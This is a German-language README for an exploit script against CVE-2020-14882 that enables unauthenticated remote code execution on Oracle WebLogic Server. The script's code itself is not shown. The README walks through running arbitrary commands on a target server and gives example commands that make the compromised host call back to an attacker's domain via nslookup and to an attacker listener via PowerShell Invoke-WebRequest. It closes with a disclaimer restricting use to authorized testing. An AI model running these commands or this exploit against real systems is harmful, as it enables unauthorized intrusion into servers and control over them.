
Dieses Skript ermöglicht die Remote-Code-Ausführung (RCE) auf Oracle WebLogic Server.
Dieses Skript ermöglicht die Remote-Code-Ausführung (RCE) auf Oracle WebLogic Server mithilfe einer nicht authentifizierten GET-Anfrage. Es nutzt die Sicherheitslücke CVE-2020-14882 aus. Durch die Ausführung beliebiger Befehle kann ein Angreifer unbefugten Zugriff auf den Server erlangen.
Stellen Sie sicher, dass Python 3 installiert ist. Um dieses Skript zu verwenden, gehen Sie wie folgt vor:
Öffnen Sie ein Terminal oder eine Eingabeaufforderung.
Führen Sie das Skript mit dem folgenden Befehl aus:
python3 exploit.py http(s)://target:7001 command
Ersetzen Sie http(s)://target:7001 durch die Ziel-URL des Oracle WebLogic Servers und command durch den gewünschten auszuführenden Befehl.
Beispiel 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
Dieses Beispiel führt den Befehl nslookup your_Domain auf dem Zielserver aus.
Beispiel 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
Dieses Beispiel führt den PowerShell-Befehl Invoke-WebRequest -Uri http://your_listener auf dem Zielserver aus.
Dieses Skript ist ausschließlich für autorisierte Penetrationstests und Sicherheitsforschungszwecke bestimmt. Die unbefugte Nutzung dieses Skripts zum Ausnutzen von Systemen ohne entsprechende Zustimmung ist illegal und kann rechtliche Konsequenzen haben. Verwendung auf eigene Gefahr.
Dieses Skript erfordert die folgenden Abhängigkeiten:
requestsurllib3Bitte stellen Sie sicher, dass diese Abhängigkeiten installiert sind, bevor Sie das Skript ausführen.